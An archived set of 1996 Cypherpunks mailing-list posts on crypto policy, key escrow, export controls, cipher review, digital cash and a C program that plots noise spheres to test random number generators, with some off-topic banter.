Content-Type: text/plain


At 1:24 AM 03/20/96, IPG Sales wrote:
>Perhaps a battle has been lost, maybe even probably? But the war is not
>over, not by a long shot - with minor modifications this system is
>absolutely secure as events will prove. However, be assured that we
>will not sell our product to anyone until that can be definitively
>established. We greatly appreciate the contribution of some of those on

You used to claim "our system is absolutely safe, we're sure of it, but we
can't tell you the algorithm cause it's secret."  People said that was
stupid, so you finally agreed to show people the algorithm (apparently
sending it to them unsolicited, and then expecting them to be bound to some
sort of non-disclosure agreement?  You might want to hire a lawyer to
familiarize you with how trade secrets work legally, cause they don't work
like you think they work).  The people you showed the algorithm to pointed
out flaws in it.

Now you say "Yeah, okay so there were flaws, but we'll fix them and then it
will be perfect, except you can't see the code or algorithm cause it's
secret."  Sounds like we're back where we started, eh?   No one was willing
to trust the algorithm before without it being reviewed publically.  No one
will be willing to trust it now either, _especially_ after the previous
concerns that the algorithm wasn't secure were _confirmed_.

The cypherpunks list doesn't have to provide free cryptanalysis to you.  I
doubt anyone will want to waste their time looking at  future iterations of
your algorithm, if you deign to show it to them.  The fact that people on
the cypherpunks list don't want to waste their time doing free
cryptanalysis for you doesn't mean that your code is secure, or endorsed by
anyone.  It means that even those who may have thought it possible that
your algorithm was secure after all have given up on that thought, or at
least decided that it's unlikely enough not to be worth much further
consideration, at least until you start behaving reasonably.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Wed, 20 Mar 96 13:44:23 PST
To: cypherpunks@toad.com
Subject: If I were the NSA...
Message-ID: <9603202144.AB02917@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


If I were the NSA, I would start threads such as the one on the IPG system.

They are very valuable to them in assessing and mapping the cryptanalysis
capabilities of the CPunks lurkers and regulars members.


Just a thought...

JFA

 Public Key at http://w3.citenet.net/users/jf_avon
    Jean-Francois Avon <jf_avon@citenet.net> 
    2048 bits key ID:C58ADD0D  1996/03/01    
fingerprint=52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 20 Mar 96 13:58:33 PST
To: abostick@netcom.com (Alan Bostick)
Subject: Re: [NOISE] Re: Dorothy Denning attacks Leahy's crypto bill
In-Reply-To: <Pine.3.89.9603192113.A23263-0100000@well>
Message-ID: <MlI7wQe00YUv4Rsk4V@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Since someone other than Jim Bell and THE LIST OF SHAME author thought I
was being serious, I thought it wise to respond.

The notion that a measure of criticism from a known enemy, Dorothy
Denning, corrects the many problems with Leahy's legislation is absurd.

As a case in point, remember that Rush Limbaugh, Catharine MacKinnon,
and the radical religious right group American Family Association
criticized the CDA. That does not make the CDA worth passing.

(Of course Rush likes dirtysexycybertalk so he can pick up chicks
online, and the AFA wanted not less, but _more_ liability for ISPs, but
I trust my point is clear.)

Speaking of the CDA, I'll be in Philadelphia tomorrow and Friday for the
hearing. Any other cypherpunks planning to attend?

-Declan



Excerpts from internet.cypherpunks: 20-Mar-96 [NOISE] Re: Dorothy
Denning.. by Alan Bostick@netcom.com 
> In article <Pine.3.89.9603192113.A23263-0100000@well>,
> Declan McCullagh <declan@well.com> wrote:
>  
> > I may have to adjust my position on Leahy's bill. Any legislation that
> > Dorothy Denning attacks so virulently must be worth passing. 
>  
> That could be exactly what They want you to think!
>  
> If They wanted us to overlook the actual flaws and trapdoors in Leahy's 
> bill, what better way than to have our knees jerk in support by arranging
> for Denning's opposition?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Wed, 20 Mar 96 15:46:56 PST
To: cypherpunks@toad.com
Subject: Spare CFP '96 student reservation
Message-ID: <96Mar20.184624edt.11077@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


A friend of mine registered as a student for the CFP '96 conference
next week, but is unable to go.  Registration is transferable, so he
can send another student in his place.  If anyone is interested, please
mail him (not me) at tew2@cornell.edu.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marcus J. Ranum" <mjr@clark.net>
Date: Mon, 25 Mar 1996 17:04:41 -0500 (EST)
To: mckenney@smiley.mitre.org (Brian W. McKenney)
Subject: Re: firewalls and CKE
Message-ID: <199603252204.RAA01115@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



Brian W. McKenney writes:
>I missed the jist of the original message

	The gist of the first message was that software
key escrow is here, and it is the greatest thing since the
discovery of fire. :)  Granted, it's nice that someone
has found a way of convincing the government to let them
export good crypto, but in this particular application it makes
no sense.

>For the firewall-to-firewall encryption
>scenario, the data recovery component (DRC) may be a machine that
>intercepts (in real-time) the traffic and then decrypts the data (recovers
>the data).  The interception of encrypted data makes sense for this type of
>communication since the data is not really stored on the firewall (it is
>wrapped/unwrapped quickly).  [the intercepted packet may be copied and then
>decrypted]

	That's completely brain-damaged if you think about it for
a second.

	Let's suppose I have a file and it is unencrypted. I
FTP it through my SKE-equipped firewall to the Paris office. 
My file gets transparently encrypted as it is broken into packets
and sent across the 'net. Then - what - someday I need the file
back so I get the escrowed key and reassemble the file from
raw packets? That's dumb! I dunno about you but I'd just recover
the clear file from a backup tape. :)

	Firewall-to-firewall encryption is a link-layer security
technology.  It encrypts data in transit: before it leaves and
after it arrives you *already* have a clear-text un-escrowed
version of the data. If I have a corporate requirement
to "escrow" my telnet sessions then I'll use a version
of telnet that logs keystrokes. But I can't see any reason
(unless I'm a spook) to de-archive, de-escrow, and reassemble a
telnet session for archival purposes.  It gets worse since
all the "escrowed" packets will be mishmoshed in with DNS queries
(all "escrowed") and NFS packets and lordy knows what else. If
it came to having packet records, why not simply log all
packets *before* they get encrypted at the firewall, while
they are still in the clear? Easier, no?

 	At least LOTUS' "key escrow" approach is openly
designed for the spooks and doesn't pretend to add value to
the end user.

	I appreciate that TIS has made a successful deal with
the devil to export some strong encryption, but it's unfortunate
that they're showcasing it in a way which makes absolutely no
sense at all.  It's a shame, because basically we're seeing
smart people doing technically goofy things in order to
comply with some ridiculous laws.

mjr.

----- End of forwarded message from Marcus J. Ranum -----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 28 Mar 96 04:43:33 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199603281242.EAA13933@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:21 AM 3/28/96, Syed Yusuf wrote:
>If a person who speaks three languages is tri-lingual
>If a person who speaks two languages is bi-lingual
>
>What do you call a person who only speaks one language?
>
>---------------------answer follows:
>
>An American.

Or our version:

What do you call a person who has to learn English as a second language in order to compete in the world?

A foreigner.

(Sorry for the insult, but it seems that this thread is bringing out insults from foreigners of all sorts.)

--Tim


Dont be sorry!

Foreigner can atleast speak broken English.  Can American speak broken foreign language? 











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 28 Mar 96 04:21:55 PST
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <31595F37.2781@cs.strath.ac.uk>
Message-ID: <8BZHLD14w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


os <os@cs.strath.ac.uk> writes:

> >There is not a single foreign language I can think of it that would help me
> >in my goals or help anyone I know.
>
> I have never known anyone being disadvantaged by knowing another language tha
> tongue.

Tim (and others) miss out the pleasure of using an exotic language in the
presense of people who won't understand it.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mike@fionn.lbl.gov (Michael Helm)
Date: Thu, 28 Mar 96 08:20:45 PST
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion to learn foreign languages
Message-ID: <199603281620.IAA05171@fionn.lbl.gov>
MIME-Version: 1.0
Content-Type: text/plain


On Mar 28,  2:13am, Timothy C. May wrote:
> communicate with his neighbor, nor do I deny Michael Helm's point that by
> not studying Talegu we are denying ourselves access to the world's culture.
> In my next 25 lifetimes, with the advent of Nanocryonic Revitalization, I

Anyone who can read, should not have any problem figuring out that
I never made anything resembling the "point" ascribed to me.
There is certainly no point in carrying on a discussion with
someone who makes false attributions like this.

I could care less what language the people around me speak, but
it would be a more civilized world if they took care to tone
up their reasoning.  And when they need to resort to lies like
this to shore up their arguments, tar & feather 'em.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Stromberg <strombrg@hydra.acs.uci.edu>
Date: Thu, 28 Mar 96 08:54:59 PST
To: cypherpunks@toad.com
Subject: Re: LACC: Sun patch pulled (was Re: HP & Export of DCE)
In-Reply-To: <199603272316.XAA13429@pangaea.hypereality.co.uk>
Message-ID: <315AC451.7D69@hydra.acs.uci.edu>
MIME-Version: 1.0
Content-Type: text/plain


The syslog problem is fixed in baseline SunOS 5.5.

Sun and HP are apparently doing what the stupid law mandates - and they
should do so, whether someone at NSA (or whatever) is on their case or
not.  :)  They should also have someone in their respective legal
departments bucking ITAR very hard.

"tres-dangerous" must have been typed with a snear, no?

ECafe Anonymous Remailer wrote:
> 
> I noticed that Sun's latest libc patch (101759-04) is empty.  Previous
> versions contained the complete U.S. version of libc, including the
> tres-dangerous DES and crypt functions.  In the current rev only the
> README remains, presumably because:
>         EXPORT INFORMATION: This patch includes code which performs
>         cryptographic functions, which are subject to U.S. export
>         control, and must not be exported outside the U.S. without
>         prior approval of the U.S. government.  Prior export approval
>         must be obtained by the user of this patch.
> 
> So, you might ask, what fixes is Sun not distributing???
>     (Rev 04)
>         1190985 gethostbyname() can trash an existing open file descriptor.
>         1182835 portmapper silently fails with version mismatch by PC-NFS
>                 client
>         1219835 Syslog(3) can be abused to gain root access on 4.X systems.
> 
> Yup, that's right.  The syslog hole that was so well publicized by
> CERT will remain open indefinitely because the ITAR makes it illegal
> for Sun to distribute the fix!
> 
> So did HP and Sun spontaneously, simultaneously develop crypto awareness,
> or is some gummint dweeb whispering threats in their ear?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Thu, 28 Mar 96 07:32:31 PST
To: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Subject: Noise sphere plotter in C for X Windows
In-Reply-To: <199603250551.AAA22514@unix.asb.com>
Message-ID: <199603281506.KAA10317@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Mutatis Mutantdis writes:

> >I've got a short program for the PC (w/TPascal source) that plots a 
> >noise sphere from a file of (pseudo) random data, if anyone is 
> >interested.  Requires a VGA card that handles mode 5Fh (640 x 480, 
> [..]
> >The source has a brief explanation of what noise spheres are and a 
> >reference to the Pickover article the program was based on.

> Somebody sent me a C++ conversion of it. It compiles fine with BCC 4.02.
> 
> Enclosed here (thanks to  "James Pate Williams, Jr." <pate@mindspring.com>)

Here's a version of it for X Windows, translated into plain-old C. 


-- Jeff
                                 oo
-----------------------------cut /\ here------------------------------
/*
  xnoisesph.c

  Compiled on Linux with:
  	cc -o xnoisesph xnoisesph.c -L /usr/X11R6/lib -lX11 -lm

  Usage: xnoisesph file
  Or:    xnoisesph <file

  Based on:

  NOISESPH.PAS, A Noise Sphere plotter written in Turbo Pascal (23-Mar-96)
  Robert Rothenburg Walking-Owl <WlkngOwl@unix.asb.com>
  No copyright is claimed.  No guarantees made.

  Usage: noisesph file

  This program reads a file of random or pseudo-random data and plots
  a noise sphere of the data. Poor RNGs or sampling methods will show
  clear patterns (definite splotches or spirals).

  The theory behind this is to get a set of 3D polar coordinates from
  the RNG and plot them.  An array is kept of the values, which is
  rotated each time a new byte is read (see the code in the main
  procedure).

  Rather than plot one sphere which can be rotated around any axis,
  it was easier to plot the sphere from three different angles.

  This program is based on a description from the article below.  It
  was proposed as a means of testing pseudo-RNGs:

  Pickover, Clifford A. 1995. "Random number generators: pretty good
	 ones are easy to find."  The Visual Computer (1005) 11:369-377.
*/

#include <X11/Xlib.h>
#include <stdio.h>
#include <math.h>
#include <errno.h>
#include <unistd.h>

typedef struct _Cartesian {
  double x, y, z;
  unsigned Color;
} Cartesian;

typedef struct _Polar {
  double r, theta, phi;
} Polar;

double ByteToReal(unsigned char);
unsigned int ScaleColor(double);
int Round(double);
void Plot(Cartesian *);
void PolarToCartesian(Polar *, Cartesian *);

int MidA, MidB, MidC, MidY, Scale;

char *pgm;
Window w;
Display *d;
GC gc;

void
main(int ac, char **av)
{
    int i;
    char *fname;
    FILE *inp;
    XEvent event;
    XExposeEvent *ee = (XExposeEvent *)&event;
    int width, height, bwidth, depth, wx, wy;
    Window root;

    pgm = basename(*av);
    if (ac > 2) {
	fprintf(stderr, "Usage: %s [file]\n", pgm);
	exit(1);
    }

    if (ac == 2) {
	fname = av[1];
	if ((inp = fopen(fname, "rb")) == NULL) {
	    fprintf(stderr, "%s: Can't open %s - %s\n", pgm, av[1],
	    	strerror(errno));
	    exit(1);
	}
    }
    else {
    	inp = stdin;
    	fname = "(stdin)";
    }

    if (!(d = XOpenDisplay(NULL)))
    {
	fprintf(stderr, "%s: Can't open display\n", pgm);
	exit(1);
    }

    w = XCreateSimpleWindow(d, RootWindow(d, DefaultScreen(d)),
	0, 0, 640, 480, 0, BlackPixel(d, DefaultScreen(d)),
	BlackPixel(d, DefaultScreen(d)));

    XSelectInput(d, w, ExposureMask);

    gc = XCreateGC(d, w, 0L, NULL);
    XSetBackground(d, gc, BlackPixel(d, DefaultScreen(d)));
    XSetForeground(d, gc, WhitePixel(d, DefaultScreen(d)));

    XMapRaised(d, w);

    while (XNextEvent(d, &event), event.type != Expose)
    	;

    /*
     * Get the window's actual width and height.
     */
    XGetGeometry(d, w, &root, &wx, &wy, &width, &height, &bwidth, &depth);

    /*
     * Initialization done, window on screen; time for real work.
     */

    {
	double X[3];
	int i, n = 0;
	int byte;
	Cartesian C;
	Polar P;

	Scale = width / 6;
	MidA = Scale;
	MidB = 3 * Scale;
	MidC = 5 * Scale;
	MidY = height / 2;
	if (MidY < Scale)
	    Scale = MidY;

	for (i = 0; i < 3; i++) {
	    if ((byte = getc(inp)) == EOF) {
		fprintf(stderr, "%s: Early EOF on %s\n", pgm, fname);
		exit(1);
	    }
	    X[i] = ByteToReal((unsigned char) byte);
	}

	while (1) {
	    P.r = sqrt(X[(n + 2) % 3]);
	    P.theta = M_PI * X[(n + 1) % 3];
	    P.phi = 2 * M_PI * X[n];
	    PolarToCartesian(&P, &C);
	    Plot(&C);
	    if ((byte = getc(inp)) == EOF)
	    	break;
	    X[n] = ByteToReal((unsigned char) byte);
	    n = (n + 1) % 3;
	}
    }

    /*
     * Now hang out.  Let the window manager kill us.
     */
    while (1)
	XNextEvent(d, &event);

    exit(0);
}

double ByteToReal(unsigned char b)
{
  /*note that there will be some gaps since we're only using the
	 equivalent of an 8-bit decimal here*/
  return  b / 256.0;
}

unsigned int ScaleColor(double x)
{
  return 0;
}

int Round(double x)
{
  return (int) (x + 0.5);
}

void Plot(Cartesian *C)
{
    XDrawPoint(d, w, gc, MidA + Round(Scale * C->y),
    			MidY - Round(Scale * C->z));
    XDrawPoint(d, w, gc, MidB + Round(Scale * C->x),
    			MidY - Round(Scale * C->y));
    XDrawPoint(d, w, gc, MidC + Round(Scale * C->z),
    			MidY - Round(Scale * C->x));
}

void PolarToCartesian(Polar *P, Cartesian *C)
{
  /* No rotation was added. Instead we plot from three angles... */
  C->x = P->r * sin(P->phi) * cos(P->theta);
  C->y = P->r * sin(P->phi) * sin(P->theta);
  C->z = P->r * cos(P->phi);
  /* We can assign colors based on x, y, z, r, theta / pi or phi / (2 * pi) */
  C->Color = ScaleColor(C->y);
}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Howard Melman <melman@osf.org>
Date: Thu, 28 Mar 96 07:46:18 PST
To: janzen@idacom.hp.com
Subject: Re: HP & Export of DCE
In-Reply-To: <199603271619.LAA08716@homeport.org>
Message-ID: <9603281542.AA05950@absolut.osf.org.osf.org>
MIME-Version: 1.0
Content-Type: text/plain



On Wed Mar 27, 1996, Martin Janzen wrote:

> Another "RPC" comes from the Open Software Foundation, who unfortunately
> chose the same acronym for the remote procedure calling mechanism in their
> Distributed Computing Environment (DCE).  This DCE is a part of the OSF/1
> operating system, but implementations are available for many versions of
> UNIX, often as a separate product or option.  The DCE Security Services
> are discussed a bit in the DCE FAQ [4], and O'Reilly has an entire book
> on the subject [5].

The product is called DCE RPC and the RPC is used
generically as you stated in the beginning of your note.
There are many RPCs in the world, aside from the ones you
listed.  DCE RPC is also known as ISO RPC as the standard is
based on DCE.  MS RPC is also based on DCE RPC as you
stated. 

DCE is not part of OSF/1 but is middleware supporting
distributed computing which is available on virtually all
platforms: (Unixes, Windows, Cray, MVS, VMS, Mac is in beta,
etc.)  Yes, one of the reference ports was OSF/1.  We sell
the source code separately.

We are now seeing OSs bundled with DCE client software.
The most recent versions of HP/UX and AIX for example.

For more info on DCE see http://www.osf.org/dce/ 

Howard

-- 

Howard R. Melman              ___   ___   ___            Voice: 617-621-8989
Open Software Foundation     /  /  /__   /__               Fax: 617-621-2782
11 Cambridge Center         /__/  ___/  /              mailto:melman@osf.org
Cambridge, MA  02142                             http://www.osf.org/~melman/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 28 Mar 96 08:09:37 PST
To: Chein-hsinLiu <r3506010@cml11.csie.ntu.edu.tw>
Subject: Re: Question about Blind Signature
In-Reply-To: <199603281310.VAA23754@cml11.csie.ntu.edu.tw>
Message-ID: <199603281608.LAA08842@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> My question is when I see how RSA encrypts using PKCS
> [desc. deleted]
> How to solve this??

You don't.  Blind signatures only work with "pure" RSA.  You cannot
use PKCS encoding to perform blind signatures.  PKCS nullifies the
multiplicity that is required for these blinding techniques to work.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 28 Mar 96 09:44:59 PST
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <2.2.32.19960328054447.006cfbec@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 04:42 AM 03/28/96 -0800, Anonymous wrote:
>At 12:21 AM 3/28/96, Syed Yusuf wrote:
>>If a person who speaks three languages is tri-lingual
>>If a person who speaks two languages is bi-lingual
>>
>>What do you call a person who only speaks one language?
>>
>>---------------------answer follows:
>>
>>An American.
>
>Or our version:
>
>What do you call a person who has to learn English as a second language in
order to compete in the world?
>
>A foreigner.
>
>(Sorry for the insult, but it seems that this thread is bringing out
insults from foreigners of all sorts.)
>
>--Tim
>
>
>Dont be sorry!
>
>Foreigner can atleast speak broken English.  Can American speak broken
foreign language? 

As a matter of fact, I speak broken Tagalog, broken Japanese, pidgin Korean,
and and can generally make myself understood in Chinese, Thai, Vietnamese,
Spanish, and French.

Oh, yes, I'm also fluent in Aussie :-)

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVoK/8VrTvyYOzAZAQHrXAP/ZMOgx+VkqHXCQHBFXIdVVHzlCcJIo3L6
2LyqMnY0cJ5ZFD8mCNsBTTe2DAXFpN1WV03JFym/JIxAuL0TQuN0WKZ2HFSuk997
AZPo21whZbXVQlRGrr6JjiR8p2nqHMMBpNC2bfr2r/rny7UmnGGp8C1e6crPtrQF
PiyDbd20zbM=
=Swae
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 28 Mar 96 09:35:57 PST
To: cypherpunks@toad.com
Subject: Re: The Law Loft: Surviving the Biometric I.D. Card
In-Reply-To: <199603280946.BAA08787@you.got.net>
Message-ID: <Pine.SUN.3.91.960328123527.13449A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MeRC <merc@redrose.net>
Date: Thu, 28 Mar 96 10:23:14 PST
To: cypherpunks@toad.com
Subject: DES or RSA on a PIC
Message-ID: <2.2.32.19960328182333.0072ff10@redrose.net>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have ANY code for DES or RSA encryption for use on a PIC
microcontroler?  A friend and I are developing an ASCII terminal (dumb term)
that encrypts data going to the serial port and decrypts data coming from
the serial port, so you could successfully send a message over a modem and
have it automatically encrypted\decrypted.  We have all the hardware almost
done, but we are having a hell of a time writing the code for the encryption...

Thanx in advance...
l8r,
-MeRC

merc@redrose.net -or-
merc@success.net 

-----BEGIN PGP MESSAGE-----
Version: 2.6.2

iQCVAwUAMUC05tnn3Dsf47p5AQE6AAP9E/JebLn1UtkOk41IGw/i4XHKckVcI6RH
ptBMucqx01sSTxaR8tXPmmkKjz5f3xndxepbbs6nKfoNuSaODWSirOlNvt3i1DWL
iUmB9+rUYmwwlpD7t6qyy2XzsAxO/M/nFT4ZxO8wi96nR/Rmp00LvCoK+YcjgQnj
HReyQrIl4X+ZAI0DMUCzOgAAAQQAv6IH+OnLeP+chsgwymSVKqsXHO1xwJLxs657
Cf3miDM3mNBB/qmRziQ1zHeC/nXgaGhR7eAdidL6MngDXl6+cw4Z5xXvenu5MpEW
zpZpwDK5/XwuvCIexQP2eHIb2Ms6vna7fUoaHGrrV4844KIVg+E36ZgWT1ZP2efc
Ox/junkABRGwAYe0I01pY2hhZWwgRC4gV2hpdGUgPG1lcmNAc3VjY2Vzcy5uZXQ+
sAED
=ZbPJ
-----END PGP MESSAGE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 28 Mar 96 11:34:44 PST
To: Blanc Weber <blancw@microsoft.com>
Subject: Re: What backs up digital money?
In-Reply-To: <c=US%a=_%p=msft%l=RED-81-MSG-960328183153Z-32962@red-07-imc.itg.microsoft.com>
Message-ID: <199603281933.OAA10926@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Blanc Weber writes:
> Perry, here's a question for you, and I am seriously interested in your
> answer:
[...]
> what, then, would you yourself consider proper for discussion here?
> [in the context of digital cash discussion]

I'd say that anything directly dealing with digital cash, its
implications, deployment, and technical issues associated with
it. General discussions of whether the Federal Reserve is a bunch of
evil old men and the like are what are out of bounds.

This means:

"How does blinding work"

and 

"Do you think that digital cash systems will hurt bank regulatory
supervision"

are fine things to talk about but

"Do you think the Federal Reserve issues counterfeit money"

are not.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 28 Mar 96 13:10:31 PST
To: Mike Duvos <mpd@netcom.com>
Subject: Re: What backs up digital money?
In-Reply-To: <199603280239.SAA15391@netcom17.netcom.com>
Message-ID: <Pine.SUN.3.91.960328154720.1406E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Mar 1996, Mike Duvos wrote:

> tcmay@got.net (Timothy C. May) writes:
> 
>  > At 1:46 PM 3/27/96, Scott Schryvers wrote:
> 
>  >> Question. If e-cash were backed by gold would that make it
>  >> more reliable than say the dollar?
> 
> Not necessarily.  Historically, gold emerged as the primary
> currency metal because

[Excellent points about gold's practical use, good timing, and industrial 
value countered by the current lack of industrial value.]

> Basically, one can create monetary value for any commodity whose
> supply can be controlled, usually by the folks wishing to lend it
> value, by simply making a stable market in it, and having the
> reputation and power to control that market in perpetuity.
> 
> The best example of this is probably the diamond market.  Here we
> have a rare but intrinsically worthless material, the gem quality
> diamond, which has no useful industrial applications at all,
> since non-gem quality diamonds and substitutes, both synthetic
> and natural, are in abundance.

I was with you until this.  In fact diamonds are anything but rare.  
Their value is the result of the most exceptional marketing by DeBeers, 
and the very tight restrictions on supply.  I might note that the 
restrictions on supply are even somewhat tangential.  DeBeers has created 
one of the most historic, long standing and impressive market distortions 
anyone has ever seen.

Of course this only goes to further the argument (which I think you are 
adopting) that it is fairly simple to estlablish a commodity of "value" 
regardless of intrinsic worth)

> Gem quality diamonds are extremely valuable, because their supply
> is carefully controlled, and because of clever marketing designed
> to convince every male human in North America and most of Europe
> that shelling out two months salary for one is the unique and
> true symbol of everlasting love.

Even gem quality stones are relatively abundant believe it or not.

> The diamond industry has even made plans for the holographic
> fingerprinting of every diamond they release, should synthetic
> gem-quality diamonds ever hit the market, so that they may
> continue their control of the supply of their "currency", even in
> the face of a flood of absolutely identical "unsanctioned" gems.

Again, even absent the intrinsic value of the substance it seems that 
marketing and perception will dictate "effective value."

> I recall a very clever Science Fiction story I read a number of
> years ago in which aliens completely destroyed human civilization
> by manufacturing all the world's goods and services, and
> accepting payment only in cowpies, which were subject to an
> arbitrary and complicated grading system similar to that used by
> modern gemologists.  One day, the aliens simply left, and human
> civilization, consisting mostly by then of PhD Cowflopologists
> with expertise only in interpreting swirls on lumps of shit,
> promptly folded.

This is precisely the point, and why, while I agree with your comments 
about gold today, I think the most important issue is the long term 
solvency of a commodity.  As you have noted, anyone can make a substance 
worth something in the short term.  (Tulips)  The challenge, and the 
goal in my view, is to create a currency based on a backing which endures 
the long term, and the unthinkable (collapse of a major government or 
some such).

> Before I digress to far from your original question, let me state
> the point I am trying to make here.  If a entity, or group of
> entities, with reputation and power to make a market, decide to
> demoninate a currency using a rare commodity, it makes little
> difference whether the rare commodity is near-perfect crystals of
> carbon found only on land that they own, a vault filled with gold
> bars, exponentiated random numbers modulo the product of two
> large but closely guarded primes, or statistically unlikely
> swirls in wads of digested plant material dropping from the butt
> of a cow.
> 
> In all these cases, the important thing is not the commodity, but
> the entities guaranteeing the market, and the perception of their
> reputation and ability to support said currency in perpetuity.
> Absolute control over the supply of the commodity in question
> doesn't hurt either.

When the value of the intrinsic worth of a commodity in question does become 
apparent is in periods of transition, flux, disorder, or strife.  The 
security of a currency is going to be a major factor, especially 
immediately following introduction, to its popularity- except in unusual 
circumstances (tulips, market distortions, etc.)

> Indeed, US government backed e-cash would be a far more trusted
> and reliable currency than gold backed currency printed by
> DigiCash BV.

I'm not sure this is precisely true.  While gold itself might not be the 
best choice, the general principal that a commodity based currency is 
less secure or trustworthy than a government backed one (even a powerful 
and imposing government) is not one I'm prepared to endorse without 
reservation.

> One good inflation-resistant indicator of whether gold is a good
> value is the ratio between gold and silver prices.  Both of these
> metals are mined with similar difficulty, and have similar uses
> for backing currency and as coinage metals.  Historically, there
> have been times when gold and silver prices were approximately
> equal.
> 
> I have no doubt that if the unwashed masses were sold the notion
> that gold was the single reliable inflation-proof form of wealth
> they could own, and the holdings of international bankers were
> sold into the hands of millions of individual citizens, a
> controlled devaluation would follow, together with much chortling
> and uncorking of champagne, as gold and silver prices became
> nearly equal again.

I believe this correct.

> As long as people who count have vaults full of the stuff, and
> wish to carry it on their books as an expensive asset, it will of
> course continue to have its current inflated value, and nothing
> will be done to depress the market.  In that sense gold is a
> reliable asset, as long as most of the little people refrain from
> jumping on the bandwagon.

Just like diamonds.
Again, while the commodity itself (gold) may not be appropriate, I don't 
believe this ends the argument.
 
>  > No form of digital money extant is an actual currency in
>  > the conventional sense. Nor does this seem likely. Nor
>  > necessary. Nor useful. Nor important.
> 
> Actual currency can circulate forever in the economy without
> eventual conversion into some other kind of money.  The
> requirements of current digital cash systems for centralized
> clearing to eliminate double spending and to mint new coins tends
> to preclude the kinds of perpetual peer-to-peer transactions we
> think of when we conceptualize "currency."

Which suggests that private currencys must utilize e-cash (if at all) 
merely as monetary instruments which continue to look much like what 
exists today.  (e.g., drafts, checks, bonds...)

> Real electronic currency could be invented, but would have to
> live its life within a population of tamper-proof smart cards
> communicating with each other through secure protocols.  Whether
> anyone will bother to implement such a system remains to be seen.

I concur.

> Until then, the "check" model of digital money is, as Tim points
> out, the correct one.

I concur again.

>  > The point being that talking about "what backs up digital
>  > cash?" is misleading. (What really backs it up is the
>  > reputation of the entities, but I digress.)
> 
> "The reputation of the entities" is the only important
> consideration regardless of what the cash is denominated in. In
> most cases, the valued commodities, if they exist, are simply
> pretty window-dressing for some unseen but powerful syndicate.

Yet here I must differ.  I'm still not convinced that a legitimate 
commodity somewhat resistant to the market distortions you cite does not 
exist.  Don't ask me what it is yet, I'll have to give it some thought.

> --
>      Mike Duvos         $    PGP 2.6 Public Key available     $
>      mpd@netcom.com     $    via Finger.                      $

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stoll@as200.zi-mannheim.de
Date: Thu, 28 Mar 96 09:28:44 PST
To: cypherpunks@toad.com
Subject: Cypher of former eastern intelligence agency broken?
